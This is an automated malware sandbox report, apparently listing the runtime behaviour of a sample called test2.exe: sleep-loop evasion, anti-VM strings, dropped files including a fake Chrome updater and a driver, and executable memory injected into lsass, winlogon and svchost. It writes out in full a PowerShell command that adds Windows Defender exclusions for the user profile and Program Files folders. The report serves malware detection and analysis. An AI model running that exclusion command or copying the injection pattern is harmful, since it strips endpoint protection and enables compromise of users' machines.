      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9908Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9887Jump to behavior
      Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 9744
      Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9748
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9737
      Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9719
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9744
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9732
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9734
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9722
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9614
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exeWindow / User API: threadDelayed 9687
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9682
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 2611
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 7376
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9802
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 4431
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 5567
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 4671
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 5327
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exeWindow / User API: threadDelayed 5367
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exeWindow / User API: threadDelayed 4631
      Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exeWindow / User API: threadDelayed 5604
      Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exeWindow / User API: threadDelayed 4394
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 5485
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 4510
      Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 4915
      Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1672
      Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 3201
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9897
      Source: C:\Users\user\Desktop\test2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmpJump to dropped file
      Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\kkldhmzqxige.tmpJump to dropped file
      Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep count: 9908 > 30Jump to behavior
      Source: C:\Windows\System32\dialer.exe TID: 2508Thread sleep count: 92 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 9887 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\winlogon.exe TID: 6832Thread sleep count: 255 > 30
      Source: C:\Windows\System32\winlogon.exe TID: 6832Thread sleep time: -255000s >= -30000s
      Source: C:\Windows\System32\winlogon.exe TID: 6832Thread sleep count: 9744 > 30
      Source: C:\Windows\System32\winlogon.exe TID: 6832Thread sleep time: -9744000s >= -30000s
      Source: C:\Windows\System32\lsass.exe TID: 7892Thread sleep count: 221 > 30
      Source: C:\Windows\System32\lsass.exe TID: 7892Thread sleep time: -221000s >= -30000s
      Source: C:\Windows\System32\lsass.exe TID: 7892Thread sleep count: 9748 > 30
      Source: C:\Windows\System32\lsass.exe TID: 7892Thread sleep time: -9748000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep count: 253 > 30
      Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep time: -253000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep count: 9737 > 30
      Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep time: -9737000s >= -30000s
      Source: C:\Windows\System32\dwm.exe TID: 1884Thread sleep count: 171 > 30
      Source: C:\Windows\System32\dwm.exe TID: 1884Thread sleep time: -171000s >= -30000s
      Source: C:\Windows\System32\dwm.exe TID: 1884Thread sleep count: 9719 > 30
      Source: C:\Windows\System32\dwm.exe TID: 1884Thread sleep time: -9719000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 1580Thread sleep count: 254 > 30
      Source: C:\Windows\System32\svchost.exe TID: 1580Thread sleep time: -254000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 1580Thread sleep count: 9744 > 30
      Source: C:\Windows\System32\svchost.exe TID: 1580Thread sleep time: -9744000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6572Thread sleep count: 267 > 30
      Source: C:\Windows\System32\svchost.exe TID: 6572Thread sleep time: -267000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6572Thread sleep count: 9732 > 30
      Source: C:\Windows\System32\svchost.exe TID: 6572Thread sleep time: -9732000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7860Thread sleep count: 263 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7860Thread sleep time: -263000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7860Thread sleep count: 9734 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7860Thread sleep time: -9734000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6184Thread sleep count: 274 > 30
      Source: C:\Windows\System32\svchost.exe TID: 6184Thread sleep time: -274000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6184Thread sleep count: 9722 > 30
      Source: C:\Windows\System32\svchost.exe TID: 6184Thread sleep time: -9722000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6784Thread sleep count: 246 > 30
      Source: C:\Windows\System32\svchost.exe TID: 6784Thread sleep time: -246000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6784Thread sleep count: 9614 > 30
      Source: C:\Windows\System32\svchost.exe TID: 6784Thread sleep time: -9614000s >= -30000s
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 6408Thread sleep count: 312 > 30
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 6408Thread sleep time: -312000s >= -30000s
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 6408Thread sleep count: 9687 > 30
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 6408Thread sleep time: -9687000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 4220Thread sleep count: 317 > 30
      Source: C:\Windows\System32\svchost.exe TID: 4220Thread sleep time: -317000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 4220Thread sleep count: 9682 > 30
      Source: C:\Windows\System32\svchost.exe TID: 4220Thread sleep time: -9682000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 3668Thread sleep count: 2611 > 30
      Source: C:\Windows\System32\svchost.exe TID: 3668Thread sleep time: -2611000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 3668Thread sleep count: 7376 > 30
      Source: C:\Windows\System32\svchost.exe TID: 3668Thread sleep time: -7376000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 9802 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep count: 124 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4660Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 4856Thread sleep count: 4431 > 30
      Source: C:\Windows\System32\svchost.exe TID: 4856Thread sleep time: -4431000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 4856Thread sleep count: 5567 > 30
      Source: C:\Windows\System32\svchost.exe TID: 4856Thread sleep time: -5567000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep count: 4671 > 30
      Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep time: -4671000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep count: 5327 > 30
      Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep time: -5327000s >= -30000s
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 7380Thread sleep count: 5367 > 30
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 7380Thread sleep time: -5367000s >= -30000s
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 7380Thread sleep count: 4631 > 30
      Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 7380Thread sleep time: -4631000s >= -30000s
      Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 4576Thread sleep count: 5604 > 30
      Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 4576Thread sleep time: -5604000s >= -30000s
      Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 4576Thread sleep count: 4394 > 30
      Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 4576Thread sleep time: -4394000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7596Thread sleep count: 5485 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7596Thread sleep time: -5485000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7596Thread sleep count: 4510 > 30
      Source: C:\Windows\System32\svchost.exe TID: 7596Thread sleep time: -4510000s >= -30000s
      Source: C:\Windows\System32\dialer.exe TID: 1280Thread sleep count: 4915 > 30
      Source: C:\Windows\System32\dialer.exe TID: 1280Thread sleep time: -491500s >= -30000s
      Source: C:\Windows\System32\dialer.exe TID: 7796Thread sleep count: 1672 > 30
      Source: C:\Windows\System32\dialer.exe TID: 7796Thread sleep time: -167200s >= -30000s
      Source: C:\Windows\System32\dialer.exe TID: 1280Thread sleep count: 3201 > 30
      Source: C:\Windows\System32\dialer.exe TID: 1280Thread sleep time: -320100s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828Thread sleep count: 9897 > 30
      Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
      Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
      Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
      Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: lsass.exe, 00000016.00000000.4433366275.00000207A96A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: lsass.exe, 00000016.00000000.4433366275.00000207A96A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
      Source: powershell.exe, 00000010.00000002.4467439830.00000279202E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: test2.exe, 00000000.00000002.4484891201.0000017A0A250000.00000004.00000001.00020000.00000000.sdmp, test2.exe, 00000000.00000000.4386773609.00007FF66155C000.00000008.00000001.01000000.00000003.sdmp, test2.exe, 00000000.00000002.4486780824.00007FF661581000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: Qemu%
      Source: test2.exe, 00000000.00000002.4484891201.0000017A0A250000.00000004.00000001.00020000.00000000.sdmp, test2.exe, 00000000.00000000.4386773609.00007FF66155C000.00000008.00000001.01000000.00000003.sdmp, test2.exe, 00000000.00000002.4486780824.00007FF661581000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: qemu%
      Source: svchost.exe, 0000001B.00000000.4484178513.000001F7E6C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
      Source: lsass.exe, 00000016.00000000.4433366275.00000207A96A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: lsass.exe, 00000016.00000000.4432790887.00000207A9613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667028015.00000207A9613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.4440250228.000001AD5DC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.5668349724.000001AD5DC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.5669382634.0000021F1562B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.4481865070.0000021F1562B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.4484296968.000001F7E6C29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.5665569135.000001F7E6C29000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\test2.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files\Google\Chrome\updater.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Adds a directory exclusion to Windows Defender
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Allocates memory in foreign processes
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 2854D4A0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 207A9DD0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AD5DBD0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1F5E4E40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20C21EB0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21F155B0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F7E7490000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 248DE760000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2B79C800000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 29418340000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 276DFF70000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25C22470000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2D45E7A0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D05B7A0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1B66DA40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 20F93870000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28813580000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 2854D500000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 207AA820000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AD5E910000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1F5E4EA0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20C21F10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21F15DD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F7E74F0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 248DE7C0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2B79C860000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 29418CA0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 276DFFD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25C224D0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2D45E800000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D05BE40000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1B66DAA0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 20F938D0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 288135B0000 protect: page execute and read and write
